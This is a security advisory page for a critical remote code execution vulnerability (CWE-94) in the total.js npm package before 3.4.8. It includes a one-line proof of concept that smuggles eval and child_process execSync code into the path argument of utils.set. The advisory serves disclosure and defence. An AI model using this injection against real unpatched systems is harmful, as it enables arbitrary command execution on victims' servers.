GHSA-3wj8-vp9h-rm6m

Suggest an improvement
Source
https://github.com/advisories/GHSA-3wj8-vp9h-rm6m
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-3wj8-vp9h-rm6m/GHSA-3wj8-vp9h-rm6m.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-3wj8-vp9h-rm6m
Aliases
Published
2021-03-19T21:32:20Z
Modified
2025-01-08T07:12:10.743116Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
total.js Remote Code Execution Vulnerability
Details

total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via set.

PoC

// To be run in a nodejs console: 
require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//')
Database specific 
{
    "nvd_published_at": "2021-03-04T17:15:00Z",
    "cwe_ids": [
        "CWE-94"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-12T22:42:43Z"
}
References

Affected packages

npm / total.js

Package

Name
total.js
View open source insights on deps.dev
Purl
pkg:npm/total.js

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
3.4.8

Database specific 

{
    "last_known_affected_version_range": "< 3.4.7"
}